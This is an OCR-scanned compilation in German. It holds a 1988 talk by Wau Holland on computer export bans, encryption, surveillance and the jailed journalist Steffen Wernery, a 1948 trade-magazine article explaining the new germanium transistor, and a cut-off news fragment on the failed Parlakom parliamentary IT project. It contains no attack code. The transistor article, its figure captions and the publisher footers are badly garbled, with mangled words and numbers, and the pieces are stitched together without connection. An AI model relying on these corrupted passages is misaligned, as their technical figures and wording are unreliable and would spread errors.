Je besser die Computer sind, desto strenger wird der Export von den
Amerikanern kontrolliert. Die stehen eben auf der Exportverbotliste für
Waffen, die größeren besseren Computer. In Heidelberg war jüngst der Fall
an der Universität, daß die Uni sich einen neuen Rechnerzusatz — einen
Vektorrechner — kaufen wollte.
Es gab schon neue Benutzungsrichtlinien für das Rechenzentrum. Die
ausländischen Studenten zum Beispiel aus Ostblockländern und China und
ja, Nicaragua war noch erlaubt, zu unserer Verblüffung, aber Südafrika
verboten — die durften nicht mehr am Rechner arbeiten, weil der eben jetzt
so leistungsfähig war. Das hätte für einige bedeutet --so meinetwegen bei
der Doktorarbeit -- die sich mit größeren Wettersimulationen beschäftigen,
wo man Rechenzeit so im Verhältnis von Tagen bis Monaten statt Sekunden
braucht -- daß die da nicht mehr hätten rechnen können, bzw. nur noch auf
dem Zweitrechner, wo das ganze dann eben nicht Tage, sondern Monate bis
Quartale gedauert hätte. Und nach heftigen Diskussionen und Protesten hat
die Uni dann beschlossen, jetzt erst einmal auf den Erwerb dieses
Rechnerzusatzes zu verzichten.
Gut, da hat sich die Freiheit der Wissenschaft ein Stück weit durchgesetzt.
Auf der anderen Seite ist die Entwicklung inzwischen soweit, daß die
Amerikaner da nicht mehr allzuviel machen können. Weil es inzwischen auf
europäischer Basis Transputerentwicklungen gibt, die viel leistungsfähiger
sind als die von den Amerikanern unter Exportverbot stehenden Rechner.
Die Transputer sind beispielsweise in London bei der Polizei eingesetzt.
Damit laufen dann solche Sachen wie Fingerabdruckvergleich per Computer.
Die Kisten machen das zu einem Zehntel des Preises etwa zehn mal so schnell
wie bisher; also den Faktor hundert. Da werden so stückweit die Polizeien
der verschiedenen Länder ausgestattet.
Als Steffen in Paris verhaftet wurde, ging auch dort die Neuanschaffung
eines solchen Fingerabdrucksystems durch die Presse, Frankreich ist in
einigen Punkten eh etwas härter. Da ist in jedem Personalausweis schon ein
Fingerabdruck drin. Das gehört da zum System. Und jetzt ist halt auch die
Maschinerie da, um das effektiv einsetzen zu können. Denn bei
Fingerabdrücken, Fingerabdruckvergleich ist ein sehr komplexes
Bilderkennungs- und Musterverarbeitungssystem notwendig.
Man kann Computer auch anders einsetzen. Zur freien Informationsverbreitung
haben die Bayern gerade bei Tschernobyl ein gutes Beispiel geliefert, daß
es eben möglich ist, wenn bestimmte Informationen einfach rausgepowert
sind, und man dann in der kapitalistischen Medienkonkurrenz rumhängt, daß
die dann unter dem Zwang stehen: irgendeiner bringt schon die Meldung, also
bringen wir die auch. Bis hin zur Bildzeitung: "Bringen Katz' und Hund Atom
ins Haus?", so diese Verkürzungen damals.
Aber: im Verhältnis zu anderen Ländern, ist hier sehr, sehr viel zu
Tschernobyl gelaufen, wo in Frankreich medienraäßig nichts gelaufen ist.
In Frankreich ist es nun auch soweit: der Staat bringt einen von Greenpeace
um, und der Konzern Greenpeace schließt in Paris sein Büro.
Das heißt: soweit, so stark ist die französische Atompolitik. Und was jetzt
irgendwelchen Hackern vorgeworfen wird, ist, daß sie eben in Frankreich
irgendwann irgendwo in der militärischen Fließbandsteuerung rumhingen und
da solche Rechner benutzt haben.
jwijuso.txt 880519
Gut, die haben die nur zum Durchschalten zu sonstwohin benutzt. Aber wenn
man sich da mal vorstellt, daß man wirklich mal da so eine Fließbandstraße
einfach über Telefon umprogramieren kann - das ist schon eine sehr
interessante Vorstellung, (Gelächter tm Publikum)
Ich muß jetzt erstmai den nächsten Zettel suchen.
Computer sind nicht nur Werkzeug, nicht nur Denkzeug und nicht nur
Spielzeug. Es sind eben auch Produktionsmittel, wie so eine
Fließbandsteuerung zeigt.
Und sie sind Nachrichtenwaffen.
Ich beharre ein Stück weit auf dieser Einschätzung, weil ich selber
irgendwo gegen Waffen bin und mich einfach zwingen muß, mich mit diesem
Aspekt auseinanderzusetzen bei den Kisten.
Als die Computer vom Militär entwickelt wurden - wenn ich da mal eine
Besichtigung für technisch Interessierte empfehlen kann: In Koblenz gibt es
ein Bundeswehrmuseum über Waffenentwicklung, die Wehrtechnische
Studiensammlung. Da findet man auch Panzer vom Nibelungenwerk drin und
einen der ersten Computer; im Holzgehäuse mit einem riesigen Hörrohr als
Trichter dran. Das ist ein Verzögerungsrechnen.
Der Trichterdurchmesser ist vielleicht 1,50 m und das steht auf einer
Holzplattform von etwa zwei Meter Durchmesser mit einer Kurbel dran. Und
das Ding kann man drehen. Und das wird auf den Himmel gerichtet — auf
Flugzeuge. Und dann wird für das Geschütz entsprechend - aufgrund des
Schalls verzögert - berechnet, wo man nun hinzielen muß, um das Flugzeug zu
treffen.
Derartige Gerätschaften in der Computerentwicklung kann man sich da in
Koblenz anschauen. Die Weiterentwicklung der Computer vom Militär hat jetzt
beim Militär zu der absurden Situation geführt, daß ausgerechnet diese
letzte Waffe, die sie entwickelt haben, umgekehrt eingesetzt werden kann.
Quasi von jedermann, durch die industrielle Massenproduktion,
Das heißt, wenn ich mir den Commodore '64 als einen "Popelcomputer"
anschau, dann ist das vielleicht die Rechenkapazität, mit der das Militär,
sagen wir mal, 1950 seine strategischen Geschichten gemacht hat. Und wenn
ich mir einen Kasten wie den Atari ST anschau, dann war das der erste Pc
der die Rechenkapazität besitzt, um, wenn man ihn als Produktionsmittel
benutzt, als Designwerkzeug für Leiterplattenentflechtung,
Gehäusedesign und so weiter -- ausreichend Rechenkapazität zu besitzen, um
auf sich selbst entwickelt zu werden; quasi eine Metaebene. Und dann jetzt
die Transputer-Entwicklung, die verschärft das ganze noch eins.
Damit ist es möglich, wirklich solche Höchstsicherheits-Verschlüsselungs-
Geräte zu machen, daß man nun wirklich nichts mehr knacken kann.
Seit etwa Mitte der 60er Jahre ist es allgemein so, daß die Computertechnik
ausreicht, um knacksicher verschlüsseln, wie es David Kahn in "The
Codebreaker" beschrieb.
(Kassettenwendepause) ...Wollen einige Leute noch die Kontrolle behalten.
In den verschiedenen Ländern wird Verschlüsselung unterschiedlich gehand-
habt. Bei Südafrika war es beispielsweise so, da war das unter Exportver¬
bot, dieses Know How dortin zu transferieren. Es hat ein Jahr gedauert,
dann hat Südafrika selber Höchstsicherheitsverschlüsselungsmaschinen expor¬
tiert. Weil: wenn man sich mit der Materie beschäftigt und drüber
nachdenkt, dann schnallt man irgendwann, wie das läuft — und dann kann man
es eben selber machen.
jwijuso.txt 880519
In der Bundesrepublik gibt es keine Baubeschränkungen bei Entwicklungen. In
Östereich werden solche Verschlüsselungsgeräte schon produziert. Und jetzt
mal als historischer Rückblick. Was macht eigentlich die Macht der
Schweizer Banken aus, wo kommt das her?
Die Schweiz stellt seit längerer Zeit Nachrichtenhöchstsicherungsgeräte
her. Zu Zeiten des zweiten Weltkrieges gab es nur in der Schweiz keine
Beschränkungen für den Nachrichtenschutz. Das heißt im Klartext: Die
Schweiz war das einzige Land zu Zeiten des 2. Weltkrieges, wo die Banken
ihre Geschäfte abwickeln konnten, ohne daß Irgendjemand anderes das Recht
hatte, das zu kontrollieren.
Ist doch klar, daß die sich dann dahin zurUckziehen.
In den USA gibt es das Data Encryption System (DES). Das ist staatliche
Vorschrift zum Einsatz von Banken und allen anderen, die irgendetwas
verschlüsselt zu übertragen haben. Also, das muß man sich auch erstmal
reinziehen, daß ' der Staat vorschreibt, was verschlüsselt, was wie
verschlüsselt wird. Wenn man da jetzt banal rangeht, kann man ja sagen, da
kann man das ja gleich sein lassen. Es gibt zumindest seit einigen Jahren
Gerüchte, daß dieses System knackbar ist. Mit Transputer-Technologie ist es
wahrscheinlich knackbar.
Aber man muß ja solche Systeme auch nicht anwenden.
Diese ganze Verschlüsselungssache habe ich hier eingeschoben, um
aufzuzeigen, wie bestimmte Entwicklungen laufen.
Von unserem Rangehen haben wir das Prinzip der möglichst großen Offenheit.
Wir gehen davon aus, daß -- nach unseren Erfahrungen -- alles was
rauskoramen kann, auch irgendwie rauskommt. Und da ist es besser, man ist da
von vornherein so klar, daß mein sich dazu stellt. So ranzugehen ist ein
Stück auch unserer Erfahrung aus dem Bundestag in Bonn. Da hat einer von
uns den Satz geprägt:
"Der Staub in den Archiven ist der Sprengstoff von morgen".
Selbst wenn man bedenkt, daß solche Veröffentlichungen wie die jüngsten zum
Atomskandal in Sellafield nach Ablauf der Archivfrist verhältnismäßig wenig
Staub aufgewirbelt haben. Der Satz ist trotzdem richtig. In dem Sinne:
bewußt mit Datenbanken umgehen. Angucken, wo man irgendwie Informationen
rausfinden kann.
Für mich das wichtigste ist da, mit offenen Augen durchgehen. Da stellt man
auch mal, meinetwegen bei einer Besichtigung vom ZDF- fest, daß es unterhalb
des Atombunkers noch ein Stockwerk gibt. Und daß man dann den Eindruck hat,
sich irgendwie jetzt nicht unter dem Atombunker zu befinden, sondern
vielleicht auf einem zentralen Nachrichtenknoten, der noch unterhalb dieses
Stockwerks unten drunter ist. Ist ja irgendwie... irgendwo müssen derartige
Installationen ja auch gemacht werden. Und wenn man schon so einen
Datenknoten in Mainz hat... naja, unvernünftig wärs nicht.
Ich habe noch zwei, drei Bücher, die ich wichtig find. Das eine ist der
Schockwellenreiter von Brunner. Die erste Auflage hatte auf dem Rücken
hinten stehen "Das Stahlnetz stülpt sich über uns". Und war eine Replik auf
eine Spiegelserie der siebziger Jahre über die Entwicklung hin zum
Überwachungsstaat. Das Ding war irgendwann vergriffen. Wir haben auch per
Bildschirmtext rumgemotzt gen Heyneverlag; etwa: "Zensur gibt es nicht,
aber kaufen kann man es nicht mehr". Dann dauerte es ein viertel Jahr, und
dann kam die zweite Auflage raus und auf der Rückseite stand auf dem
jwijuso.txt 880519
Klappentext: "Militär gegen Hacker" - als Aufmacher. Das ist bezogen auf
den Inhalt von dem Buch auch zutreffend, aber ich hab in der Situation
einen Schreck gekriegt. Tja, und wenn ich mir das so anguck: das, was mit
Steffen jetzt passiert, ist ein stückweit eine Konsequenz von dem, was in
dem Buch beschrieben wird.
Da sind eine Menge von gesellschaftlichen Situationen beschrieben, wie sie
sich hier entwickeln. Dort habe ich auch das erste mal eine besondere
historische Darstellung gefunden — man kann Science Fiction auch
vergangenheitsbezogen lesen. Im Schockwellenreiter steht eine kurze Notiz,
so fünf Sätze zum Thema Chile drin.
Stafford Beer, ein britischer Kybernetiker, der Berater von Allende war,
hat versucht, über gesellschaftliche Datenkontrolle und freien Zugang zu
Informationen die Volkswirtschaft besser zu managen. Kurz: die Betriebe
haben die Pflicht zur Informationsabgabe und das Recht, die Daten gesammelt
zu kriegen.
Ich würde mich zum Beispiel bei der Volkszählung beteiligen, wenn ich das
Gesamtergebnis komplett auf CB-BOn kriegen könnte.
Und als Stafford Beer in Chile diese Sachen versucht hatte voranzutreiben
und anzugehen, da kamen die Amis, wurde Allende umgebracht und das
Experiment beendet. Da wurde es denen zu brisant. Und über diese
Entwicklung nachzudenken, inwieweit das heute wieder ansteht, hier in der
Bundesrepublik ist ein guter Platz für sowas, daß ist ein stückweit meine
Utopie.
Im Schockwellenreiter steht dabei, daß dieses Rangehen einige Leute so
wütend gemacht hat wie die Entdeckung, daß die DNS sich aus nur fünf
Grundbestandteilen zusammensetzt.
Die Geschichte, die auf der Gentechnikseite auf uns zukommt...
Sinne möchte ich nicht nur auf Steffen weisen, sondern auch auf
Ingrid Strobl und Ulla Penselin, die zur Gentechnik arbeiten, also einem
anderen brisanten gesellschaftlichen Gebiet neben Computern und hier in der
Bundesrepublik einsitzen. Das ist ein anderes gesellschaftliches Kampffelü,
wo es um eine positive oder negative Utopie geht.
Bei der Gentechnik ist eine gewisse Kluft zwischen Forschung und Lehre bei
der katholischen Kirche oder den Jesuiten, wie Heiner Geissler ja auch
irgendwie aus der Ecke kommt, so, daß die kirchliche Forschung
siabzehnhundertsechsundsiebzig in Italien erstmals eine Hündin künstlich
befruchtet hat. Das ist das Wissen der katholischen Kirche um die
Fortpflanzung. Aber noch jetzt werden Lehrer, Professorinnen der
katholischen Kirche entsprechend gemaßregelt, wenn sie andere als die
amtliche Fortpflanzungsgeschichte erzählen. Diese Kluft von I 988 - I 776 ,
die versuchen wir zu verkürzen in der Wissensweitergabe.
Zu den Negativismen, die - auch - aus der Gentechnik mir vorstellbar sind,
da gibt es ein zweites Buch: Neuromancer von Gibson. Es läßt sich lesen als
NeuroMancer oder NeuRomancer. Er schildert eine gesellschaftliche
Entwicklung, wo der Tod insofern abgeschafft ist, als Gehirn und Rückenmark
irgendwie mit Nebenanschlüssen an Computern weiterhin gelagert werden
können und die kleinen Gnome vom Züriberg auch auf Dauer noch irgendwelche
Konzernherrschaften übernehmen können. Wo mensch sich nicht mehr mit den
Fingern über Tastatur in eine Datenbank einklinkt und mit den Augen auf den
Bildschirm guckt, sondern quasi verkabelt ist mit dem Datennetz. Und
bestimmte Informationen direkt in den brain reinkriegt.
jwijuso.txt 880519
Da ist das Umgehen mit Hackern dann so geschildert: wer sich da in
unerlaubte Gebiete vortastet, riskiert gleich einen Gehirntod - über die
elektrischen Impulse aus der Datenbank,
Ein Freund von mir hat das Buch gelesen und spontan gesagt, er habe den
Impuls gegen dieses Buch ein anderes zu schreiben, weil er das so
schrecklich findet. Aber ich empfehle es, weil es notwendig ist, auch vor
irgendwelchen schlimmen und schlechten Sachen nicht die Augen zu
verschließen, sondern hinzugucken, was da laufen könnte. Und um für den
eigenen Weg, die eigene Richtung eine gewisse Klarheit zu kriegen, wohin
sich entwickeln und was mensch machen will.
Als eine Forderung: wir wollen die Tele-Kommunikation, die Kommunikation
billiger machen und fordern dafür die Nutzung der Datenfreizeit auf den
internationalen Standleitungen. Das ist etwas, was Hacker praktizieren. In
diesem Sinne haben wir uns auch bemüht, in den englischen Sprachraum hinein
den Begriff Data-Travellers zu tragen: "Datenreisende". Die Datenschleuder
heißt "Das wissenschaftliche Fachblatt für Datenreisende", weil wir schon
vor längerer Zeit befürchteten, daß der Begriff Hacker von Leuten, die
unsere Art des Rangehens versuchen zu kriminalisieren, immer mehr entwertet
wird und wir von daher eben einen Ausweichbegriff brauchten.
Das auch als eine Richtung von unserem Vor- und Rangehen. Und in diesem
Sinne bemühen wir uns um die Aufzucht und Pflege von der Verbreitung
öffentlichen freien Wissens. Und diejenigen in den Jusos, die aufmüpfig
genug sind, gegen die...; auch in der Partei gegen den Stachel zu löcken,
und dieses Wissen ebenfalls verbreiten wollen - und das tun wollen -
zusammen mit anderen, die an dieser Aufklärung interessiert sind, die
werden feststellen, daß es effektiv ist, da:
Uoopevativ zu arbeiten: mit allen, die die gleichen Ziele haben.
Und daß das nur parteiübergreifend geht.
Das ist mein Beitrag zum Thema.
Auf der Veranstaltung wurde von allen Anwesenden einstimmig eine Resolution
zur sofortigen Freilassung des Journalisten Steffen Wernery verabschiedet.
Die ordnungsgemäß verabschiedete Juso-Resolution wurde vor Veröffentlichung
von zumüpfigen Parteileichen ausgebremst. Steffen Wernery wurde inzwischen
ohne diese resolute Unterstützung nach 67 Tagen Haft freigelassen.
© 1988 Wau Holland * Abdruck honorarfrei bei Quellenangabe (Kürzungen nur
nach Absprache) und Bezugshinweis auf die Datenschleudex , Das wissenschaft¬
liche Fachblatt für Datenreisende, Schwenckestr. 85 , 2 HH 20) und Zusendung
von fünf Belegexemplaren nach Erscheinen.
wyg2:e:archiv:stve: jwijuso.doc Korrektur 27.5-88 18:23
Eingang
Ausgang
i^aMcUe^ aü
Konfakf-
federn
ßermonium-
Block
Aufbou doi Tramiilors.
messer co.'l,?"''", LänflC 15,8 mm
Nachdem die E>U^^•iekluug dieses neuen
sehaltolcmonies bcroils vor c.n.fcer Zeit
bekatintwurde, sind jetzt nt
UnXmhcn FaohzeiLsehriften genauere
Unterlagen Uber die Gcrmamum-Halb-
lelter-Triode entbnUen. Wir mochten un
Kcr.m Uvsern die neueste Erfindung nicht
voremlinlleii und bringen iin folgenden
emo Krlliutorung der Einrichtung, dci
11. U. eine grode. worin nictil sogar um-
w'ld/.endu Hedelltilllg 7.11110011111.
Bai der Erforsohunff des Verhaltens von
Halhlr.ltorn, cUe ln dar Funkt^hnlk
weuon Ihrer bekannten Glclchrichtcr-
wlrkung (Detektor, Sperrsohl chtglelch-
richter) seit -langem eine gewisse RoUe
spielen, stieß eine ArPeiUsgruppe der
Ben-Litboralorien, bestehend aius Dr.
John Barden, Dr. Walter Bratlain tmd
Dr. William Shockley, auf einen bisher
onbekannton Effekt:
Wird an ein GermiuiiuiTtkristall oder ge¬
wisse andere Halbleiter mittels emer
feinen KonU-tklsplUe eine Spaiuiung an¬
gelegt, so verändert der Kristall in eng¬
ster Nachbarschaft der Kontaktstelle
seine Leitfähigkeit je nach der Größe
de.s Spannnngswertes. Wenn der so auf
Leitvermögen steuerbare Kristall in
einen zweiten Stromkreis gelegt wird,
der den ersten Kreis erweitert, lassen
sich mit kleinen Schwankungen der
.Stouerspannung Im ersten Kreis .gioßc
Anderungsbeträge des Stromflusses im
zweiten Kreis erzielen (s. Abb. 1). Der
Halbleiter zeigt also einen ähnlichen
Verstärker m e. chanlsmus wie
eine gtttorgesteuerto Elek¬
tronenröhre ln Verstärkcrschal-
Lung.
Die Erklärung für diese Erscheinung
Uefert die EnorgicbandUieorie der Elek-
ironenlelfting in fe.stcn Köipern, aus der
auch die Gleichrichterwirkung von
Halbleileni zu ve.rstchen ist.
Ein fester Koni-r «1 Iciitiihis. wenn (he
Kunercii KlcktronenschnUn seiner Atome niclU
voll. ( 1 . Ii. aht weniger als riehl Elokironen
besetzt sind, bzw. wenn .sieh die Aiißenelek-
tronen seiner MoleUUlo nirlit zu vollen Krhalen
ergänzen, Die äußeren Elektronen sind dann,
wie cs bei (len nuu.slcn Melnllen der Fall ist.
frei bewcglirh in dem Sinne, dan eim-.s da¬
von zum NncUbaratom hiiiUborwceliseln kann,
von diesem eines zum nächsten usw., was
einem Transport olcklrLschcr Ladungen durch
den ganzen Leiter gleichkommt. Da jede
Elektronenschale vom Atomkern gesehen
ein bestimmtes Energicnivcau darsUltt, darf
man sich die äußeren und für die Leitlä ugkeit
i^gebenden Schalen in einem Mctallknstall
zu durchlaufenden Energiebändern zusi^men-
gesetzt denken: in diesen geht die Elektroncn-
verschiebung (Stromiluß) vor sich. Kein
Elektron darf sein Bond ohne weiteres ver¬
lassen. Nur wenn ihm von außen Energie
zuKefUbrt wird, kann es auf ein hdher ge¬
legenes „erlaubtes" Eneigieniveau übergehen,
das Eomilß der Energiequantelung vom ersten
Band durch einen für Elektronen „verbotenen
Bereich getrennt i.sl. Der Physiker nennt
einen solchen Entl einen niigci-cgten Zuslimd
des Atoms. . .
I-Ialblciter sind als Stoffe anziisehcn. bei
denen im gewöhnlichen Zustand nur sehr
weniRo frei bewegliche Elektronen vorhanden
sind, etwa nur eines auf 1 Million Atome.
Während aber bei guten Leitern und auch bei
Nichtleitern die Zahl der beweglichen Elek¬
tronen kaum zu beeinflussen ist. kann bei
Halbleitern leicht erreicht werden, daß sie
sich durch Anregung, d. h. überführen ein-
•zolncr Elektronen auf ein höheres En^gie-
band um das lOOOfachc vermehren. Die Folge
davon ist bessere Leitfähigkeit, weil im an¬
geregten Zustand das normale untere Energie¬
band und das erlaubte höhere nur teilweise
mit Elektronen besetzt sind (.s. Aiib. 2).
(Die wahren Verhältnisse in Halbleitern, die
gewöhnlich durch Fremdatomo verunreinigt
sind, stellen sich etwa verwickelter dar. Das
hier entworfene Bild mag jodoch genügen,
um eine Anschauung vom Wesen ci<» Halb-
loilcr-Lcilvei-mögcas zu geben.)
Für den Germaniumkrlstall ln dem An¬
ordnung' gemäß Abb. 1 darf man sich
vorstel’.en, daß durch die angelegte
Steuerspannung zwischen der zugehori-
g(ai Kontaktspiitze und der Basis eine
Zone entsteht, in der die Leitfähigkeit
mit der steuernden Spannung oder dem
Steuerstrom infolge veränderlicKer An¬
regung schwankt. Im Ausgaxtg-sitrieäs,
der durch diese Zone verändeirlich.e(r- ILeit-
fähigkelt von Kontakt B zu Kon-t-aJet A
führt, läßt sich dann mit etniesr -ii»
Eingangskreis liegenden 'überla.^-ertea
Sbcuorwechselspanntmg tmtier diet- "Wir¬
kung einer eigenen etektromotoirisK>h,eß
Kraft ein Strom überhöhter Amj>li-fcu4e
gowinnen.
Das von Bell .geschaffene Verstärlcer-
clomcnt ■wird seiner negativen W^Jajer-
Koniaktspitan
Oertnü'
, niufr^
\lone
vem-
liccUr ^
\lfitfAhlg
keif
tvT*
[noubler ober
i.normalcrweise
\\unbesef7lffBere'(h
Veföolener dfEeich
m
,1
Steucrspannufig
(Eingang)
G)
Strom
(Ausgang)
d [ Dormakrwrise
\ \-9ll bnenier
[ Bereich
Heine leitföhigkeit.
öc unteres Energie- da bfJiie Sor -
band yot! u. oberes der teilweise
unbesetzt. besetz).
©
Elektronen Elektronen
lösender—/—treibender
Kontakt Konfakt
lOerfiioniun^ [|
''(. lU
n
iCewf/nw.Tn
-liMiliIt
©
Abb.l. Dorslellung der Verslörkcrwirkung eiaes
Germaniumkriilalles
Abb. 2. Energicbondichcmo für einen Holblciler.
unongeregler Zmlond ohne tä''. °h,gke,l
Rechls: angeregter Zoslond rnit ieillohiBkeil
intolgo Elekironenverschiebgng im oberen und
inlolgo Lückcnvcrschiebung im unteren Bond
Abb. 3. Grundsölriiehe Schollung oinos Halbleiter-
Verstärkers
Abb. 4. Grundiälzliche Schollung eines Holbleiter-
Oszillotors
stanclscharakterlstik -wegen ,,Ta-.an-
sistor" genannt. Es zeigt eine Schal¬
tung nach Abb. 3 und Uefert eiae. "Ver¬
stärkung von etwa 1 : 100, 'entsprechend
20 Dezibel. Das verwendete Stüclcchec
Germanium -— cs sind au^h andere Halb¬
leiter brauchbar — ist m einer Iclemen
MetaUhülse gefaßt, die einen iDua-ch-
messer von einigen Millimetem haut und
nicht ganz 25 mm lang ist. Diie •Theäjäen
Kontaktspitzen CWolfram) stehen, im
Abstand von nur 0,05 mm nehenein-
ander.
Bisher wurdcai Transistor-'VerstÜ.rker-
clemente entwickelt, die bis zu einer
Frequenz von 10 MHz .goolgnet sin,(j, jjjj,
eloktnischos "Verhalten weicht von, '<Jeni
einer Elektronenröhre etwas -ah.
Eingangsimpedanz Ist niedrig (citwa
1000 Q) und cUc Ausgangsimpedaaiz hoch
(einige 10 000 n). Die Leistuiigsa,uf.
nähme bewegt sich lumSOm'W. (Bei rt«
Angaben handelt es sich um
stimmte Ausführung eines Germa-n.i
Verstärkers.) Der Traksistor soll
reich zwischen — 50°Cund 5 q o
tcmpei-aturabl)ängi.ges Verhalten
Elektrische Stabilität, Robustl^o-^^®^®^
Lebensdauer sollen ähnlich sein ^
guten Kristalldetektoren, b«|
Ein stromsteuerndes HalbleitoreJ. |
kann auch zum Aufbau eines Oszin^® t
dienen (Abb. 4). In .diesem Pall
Ein- und Ausgangskneis als - - '
Schwingkreise ausgebildet.
Die erste Vorführung von Tramsüstn
Elementen und damit ausgestattetej-
rate fand im Sommer 1948 statt.
Auf Grund der wenigen bisher veröff^j^|.
lichten Angaben ist anzunehmen,
der Transistor in einem ließtirruuten
Bereich einfacher Eweckbestii-n,Tri,T,np'
tatsächlich geeignet ist, .die E i
trernenröhre zu ersetz-ej^
Iteineswegs aber überall! Viel wird da¬
von abhängen, ob die Stoßempfindiicj^.
keit gering genug ist, um die
StabiliUit hinreichend konstant zu halten
In dieser Hinsicht wird von den
Laboratorien selbst zugestanden, daß
Herstellung-sprableme noch nicht voll gg,.
löst sind.
Zum ersten Male, seitdem üer olnffj^g.j^g
Detektorempfänger wopn seiner
zulänglichen. Leistung in den Hintej-,
grund gedrängt wurde, l-st jetzt
röIirenlo.se Hochleustungscmpfängcir
den Bereich des Möglichen gerückt!
W. R.
X«/
PUNK-TBCHNIK Nr.
TRANS
Der unter diesem Namen von den Bell-
Laboratorien ln New York eingefiüirte
Kristall-Verstärker hat äußerst geringe
räumliche Abmessungen. Er benötigt
keine Heizstromquelie und hat auch kein
Vakuum. In den Bereichen, in denen
diese Haibleitertriode die herkömmlichen
Elektronenröliren ersetzen kann, bieten
sich deshalb bei der Verwendung des
Transistors bestechende Vorteile. So¬
fortige BetrlcbsbcrcJ.tschaft ohne Auf-
heizungsperiode und die etwa 10 bis
20 mal so lange Lebensdauer wie bei
normalen Radioröhren sind nur einige
der Faktoren, die zusammen nut dem
sclir kleinen Raumbedarf eine Vielzahl
von Anwendungen ermöglichen.
Bei der erstmaligen Vorführung dieses
Transistors wurde ein normaler 10-
Röhren-Superhet gezeigt, in dem sämt¬
liche Röhren durch die Haibieitcr-
Trlodcn ersetzt waren. In Abb. 5 ist die
Schaltung eines solchen ,,röhrenlosen“
Gerätes skizziert. Man erkennt, daß ein
derartiger Empfänger außerordentlich
einfach aufgebaut werden kann, und dör
deshalb — evtl, auch in Verbindung mit
„gedruckten" Schaltungen — walir-
schcinlich zu einem verhältnismäßig
niediigem .Preis herzustcUen ist.
Immerhin steht man erst am Beginn
dieser neuen Entwicklung und vorläufig
ISTOR
stellt die bis jetzt erreichte Ausgangs¬
leistung von 25 ... 50 mW noch eine ge¬
wisse Grenze dar. Es sind jedoch schon
einige Verstärker aufgebaut worden, die
zunächst die grundsätzliche Eignung des
Transistors bewiesen. Femsprechver-
stärker, Apparate für Schwerhörigen-
Geräte und Ferasehzwischenverstärker
wurden mit den entsprechenden Prüf¬
geräten durchgemessen und es konnten
die geringen Vorzcrrungsclgctwchaftcn
und der — im gegebenen Bereich —
große Frequenzumfang der Transistor-
Geräte fcstgestellt werden.
Abb. 6 gibt einen Größcnvergledch rwi-
schen einem ZündJiolzbriefclicn und
einem Transislor-Tongcnerator. Dieser
Oszillator erfüllt die gleichen Aufgaben
wie ein entsprechendes Röhrengerät.
Die ganze Kapsel ist nicht größer als
ein Röhrensockel und enthält den Tran¬
sistor, canen Transformator und je zwei
Widerstände un4 Kondensatoren. Die
vier Steckerstifte dienen in bekannter
Welse zur Verbindung mit den benötig¬
ten Batterien und zur Herstellung des
Masse- sowie Ausgangsansclüusses.
Ähnlich wie bei einer Elektronenröhre
läßt sich auch beim Transistor das elek¬
trische Verhallen an Hand von Kenn¬
linien überseht. Abb. 7 und 8 zeigen
einige typische Kennliiüenfelder der
Halbleiter-Triode. Der Eingangsstrom
durch, den elektfonenlösenden Kontakt A
i.st näheruhjgsweise durch
Ie = f (Ue -f- R . Ia)
b'eaclirieben. Hierin ist R eine von der
Vorspannung unabhängige Konstante
und der Ausdruck R • kennzeichnet
einen Rückkopplungsfaktor, der ggf.
Unstabilitäten hervorrufen kanntozw. zur
Anfachung von ungedämpften Schwin¬
gungen auszunutzen ist.
Nach den bis jetzt bekannten Betriebs¬
bedingungen wird die Vorspannung
des elektronentreibenden Kontaktes B
.so elngastellt, daß sich ein etwa gleich
großer Strom wie auf der Eingangsseite
ergibt. U,^ liegt etwa in der Größen¬
ordnung von — 45 V, und nach Abb. 8
ist somit analog zu den Verhältnissen
bei Elektronenröhren eäne Steilheit von
ca. 6 mA/V zu definieren. Wie jedoch
aus dem Keimllnienfcld zu entnelnncn
ist, hängt die wirksame Steilheit stark
von den angelegten Spannungen ab, und
nach den bisherigen Veröffentlichungen
ist die Verstärkungsregelung durch dne
Veränderung der geringen, positiven Vor¬
spannung weitaus wirksamer als bei den
normalen Trioden. C. M.
i, i t e r a t u r h i 11 w c i s ; Physlcal Review
Juli 19J8; , Audio-Engineoring JulPAugust
lO'lS; Electronics August 1943; Toute la Radio
Nr. 128 (Sopt. 1948), S. 258; Radio Craft
Ed. 19 (Sept. 1948), Nr. 12, S, 24: Wirolcss
World Bd. 64 (1948), Nr. 10, S, 3,58; Touto la
Radio Nr. 129 (Old, 1948), S, 289; Radio
Technik (1948), Nr. 10, S. 505.
Abb. 6 . Dor Transislor-Tongcnerator im Röhrensoclel
Abb. 7 (rechts). Gleidislrom-Kennlinienfeld des Iransistors. (Ströme
vnobhongig variabel, Spannungen abhängig veronderlich.)
Abb. 8 (links). ,,Statisches“ Kennlinienfeld eines Tronsisfors
m. b. H.,
monalUch
clioint mit Genehmigung der franzBstschen Mllltltrroglerung. MonalUch ■> si„rie VeH»,-. ixr„.snr m , n
.ln. llednUtlon Berlln-Boralgwaldo, Elchborndamni. Tel.: 40 CG «■) bhei V Wedding-Verlag G,
_irr DM 4.10 (cinschlleOIlch 9 Pf. Postgebühren) zuzUtrlich 8 Pf ^ ^ R 1 n t. Bezugspreis monaiiicn
r*n^h**'r*rnir'lterlTns durch icjllalboten monatlich koeatert. Bestellungen beim Verinr^ ^ ^ werden inner¬
halb Groll Berlins GenehmigungVelVe.?a'ges gllsTaUeT'K^ ä^ckhÄmÄ.^“"'"- """
iruNIC-TKOIlNIIC erschoi
Berlin N 05, MUllcrntr,
DM 4 —. Bel Postbezug DM 4.10
Parlaments-Kommunikation Schach-Matt gesetzt
Alle Fehler bei Parlakom voll ausgeschöpft
Von unseren Redakteuren Ralf Kellermann und R. Uwe Proll
Die Bundestagsabgeordneten werden nun doch bd ihrem Umstieg aus der Postkutsche in den informationstech- 1 '"Stritten. Unstimmigkeiten hatte
nischen D-Zug einen Zwischenaufenthalt eintegen müssen. Das Scheitern des Pilotprojekles Parlakom ist zwischen den Fraktionen vor
mittlerweile amtlich bestätigt: in einem internen Rundschreiben hat Bundestagsdirektor Dr. Joseph Bucker die bei der Frage gegeben, ob cs
Versuchsphase als gescheitert bezeichnet. Dabei war die Verwaltung des Deutschen Bundestages mit grollen einziges Informations-
Ambitionen gestartet. Parlakom sollte zugleich ein Vorbild herstellerunabhängiger Beschaffung und offener geben
Systemarchitektur nach dem OSI-Standard werden. Die Leitlinien des Projektes legte eine Studie der ein
Gesellschaft Für Mathematik und Datenverarbeitung (G MD) fest, die bereits im Vorfeld ein Anforderungsprord Die Frak-
hinsichtlich Datenschutz und -Sicherheit, Schulung, Leistungsfähigkeit und Qualitätsmcrkmalen des Equip- entschied '^ärnlich
